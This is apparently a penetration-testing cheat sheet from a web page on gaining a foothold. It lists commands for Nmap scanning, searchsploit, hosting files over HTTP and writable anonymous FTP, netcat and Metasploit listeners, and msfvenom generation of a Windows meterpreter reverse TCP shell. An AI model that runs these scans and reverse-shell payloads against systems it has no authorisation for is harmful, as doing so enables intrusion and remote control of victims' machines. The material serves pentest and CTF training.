top of page
.png)
Gaining A Foothold (Pre-Exploitation)
Basic Scanning
Nmap Scan: nmap -A -T4 -p- <victimip>
​
Nmap Smb-Vuln Check: nmap -p 139,445 --script smb-vuln* <victimip>
​
Search For Exploit: searchsploit <service>
File Hosting
Using Python 2: python -m SimpleHTTPServer 80
​
Using Python 3: python3 -m http.server 80
​
Ftp Server With Anon Login Enabled: python -m pyftpdlib -p 21 --write
Setting A Listener
Netcat: nc -nvlp <port>
​
Metasploit Listener: msfconsole {
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 4444
run
}
Metasploit
Windows reverse tcp shell gen: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f <filetype> -o file.filetype
bottom of page